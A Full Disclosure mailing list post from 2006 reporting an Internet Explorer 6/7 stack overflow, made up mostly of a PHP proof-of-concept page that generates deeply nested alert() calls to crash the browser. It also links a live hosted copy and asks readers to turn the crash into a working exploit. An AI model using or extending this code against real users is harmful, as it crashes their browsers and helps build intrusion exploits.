Full Disclosure mailing list archives
Internet Explorer 6.x Stack Overflow
From: Adriaan <adriaangraas () gmail com>
Date: Sun, 26 Nov 2006 11:12:25 +0100
IE 6.x Stack Overflow It is tested on IE7 and serveral versions of IE6, though not below 6. In some cases the browser does not crash but displays a Run-time memory full error. This happens when Windows does not have SP2 - but I didn't test it thoroughly. /* ie_stack.php */ <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd "> <html> <head> <meta http-equiv="content-type" content="text/html;charset=UTF-8" /> <title>Internet Explorer 6.x Stack Overflow</title> </head> <body> <div style="width:400px;padding:10px;margin:10px;border:1px dashed silver;"> <p> Copyright © Adriaan Graas<br /> Internet Explorer 6.x Stack Overflow </p> <p> Change the amount of code by changing the <tt>GET j</tt> variable in the url, f.e. <tt>index.php?j=10000</tt>. </p> <script language="JavaScript"> <!-- <?php if(!isset($_GET['j'])) $_GET['j']=10000; if($_GET['j'] < 1000000){ for($i=0;$i<$_GET['j'];$i++){ echo"alert(alert("; } for($i=0;$i<$_GET['j'];$i++){ echo"))"; } }else{ echo"document.write(\"Sorry, <tt>j >= 1000000</tt> is not allowed.\");"; } ?> // --> </script> </div> </body> </html> /* End of file */ This script is also hosted here: http://www.pc1337.nl/iestack/iestack.php?j=10000. The php can easily be rewritten to javascript or vbscript. In fact, you can use functions different than alert() to overflow the stack. I am not experienced enough to exploit this. It would be nice if someone works this out. More tests are also welcome. Adriaan Graas _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Internet Explorer 6.x Stack Overflow Adriaan (Nov 26)